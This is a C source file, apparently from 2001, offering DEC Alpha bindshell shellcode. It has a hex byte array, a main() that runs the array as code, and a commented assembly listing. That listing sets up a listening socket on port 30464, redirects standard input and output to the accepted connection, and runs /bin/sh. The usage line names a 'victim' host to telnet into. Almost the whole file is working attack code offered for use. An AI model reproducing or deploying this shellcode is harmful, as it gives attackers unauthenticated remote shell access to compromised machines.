/*
 * dec alpha bindshell here !
 * usage : telnet victim.host.com 30464
 *
 * truefinder, seo@igrus.inha.ac.kr (2001/06/27)
 * 
 */

char code[] =
"\x48\xfe\xde\x23\x0f\x04\xde\x47\x01\x74\xf0\x43\xb0\x01\x2f\xb0"
"\xb0\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xb4\x01\x2f\xb0"
"\x01\xf4\xee\x43\x21\x17\x22\x48\x01\x54\x20\x40\x90\x01\x2f\xb4"
"\x10\x54\xe0\x43\x11\x34\xe0\x43\x12\xd4\xe0\x43\x80\x34\xec\x47"
"\xff\x7f\x4a\x6b\xa0\x01\x0f\xb4\xa0\x01\x0f\xa6\x90\x01\x2f\x22"
"\x12\x14\xe2\x43\x80\x14\xed\x47\xff\x7f\x4a\x6b\xa0\x01\x0f\xa6"
"\x11\x34\xe0\x43\x80\x54\xed\x47\xff\x7f\x4a\x6b\xa0\x01\x0f\xa6"
"\x11\x04\xff\x47\x12\x04\xff\x47\x80\x74\xec\x47\xff\x7f\x4a\x6b"
"\xa8\x01\x0f\xb4\xa8\x01\x0f\xa6\x11\x04\xff\x47\x80\x54\xeb\x47"
"\xff\x7f\x4a\x6b\xa8\x01\x0f\xa6\x11\x34\xe0\x43\x80\x54\xeb\x47"
"\xff\x7f\x4a\x6b\xb8\x01\xde\x23\x58\xfe\xde\x23\x0f\x04\xde\x47"
"\x69\x6e\x3f\x24\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20"
"\x82\x16\x41\x48\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5"
"\xa0\x01\xef\xb7\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47"
"\x04\x74\xf0\x43\xa8\x01\x8f\xb0\xa8\x01\xaf\x20\x80\x74\xe7\x47"
"\xff\x7f\xea\x6b"
;

void (*f)();
main()
{
        f = code;
        f();
}

/* 
 * assembly code below !


.text
        .globl main
        .ent main
main :
        lda $sp, -440($sp)
        mov $sp, $fp

 call_pal_set_here:
        addq $31,0x83,$1
        stl $1, 432($fp)
        addq $fp,432,$10
 ret_set_here:
        mov 0x6bfa8001, $1
        stl $1,436($fp)

routine_start:
 var_set:
        mov 0x0077,$1
        sll $1, 16, $1
        addq $1, 0x0002, $1
        stq $1, 400($fp)

 socket_start:
        addq $31, 0x2, $16
        addq $31, 0x1, $17
        addq $31, 0x6, $18
        cmoveq $31, 0x61, $0
        jsr $26,($10),0xffff
        stq $0, 416($fp) 

 bind_start: 
        ldq $16, 416($fp)
        lda $17, 400($fp)
        addq $31,0x10,$18
        cmoveq $31, 0x68, $0
        jsr $26,($10),0xffff

 listen_start:
        ldq $16, 416($fp)
        addq $31, 0x1, $17
        cmoveq $31, 0x6a, $0
        jsr $26,($10),0xffff

 accept_start:
        ldq $16, 416($fp)
        bis $31, $31, $17
        bis $31, $31, $18
        cmoveq $31, 0x63, $0
        jsr $26,($10),0xffff
        stq $0, 424($fp) 

 dup2_start:
        ldq $16, 424($fp)
        bis $31,$31,$17
        cmoveq $31, 0x5a, $0
        jsr $26,($10),0xffff

        ldq $16, 424($fp)
        addq $31, 0x1,$17
        cmoveq $31, 0x5a, $0
        jsr $26,($10),0xffff

 var_release:
        lda $sp, 440($sp)


 execve_start:
        subq $sp,424,$sp
        mov $sp,$fp

        mov 0x6e69622f, $1
        mov 0x68732fff, $2
        srl $2,0x08,$2
        stl $1, 400($fp)
        stl $2, 404($fp)
        stq $fp,408($fp)
        stq $31,416($fp)

        lda $16, 400($fp)
        lda $17, 408($fp)
        clr $18

start_here:
        addq $31,0x83,$4
        stl $4, 424($fp)
        addq $fp,424,$5

        cmoveq $31,0x3b,$0
        jsr $31,($10),0xffff

        .end main

*/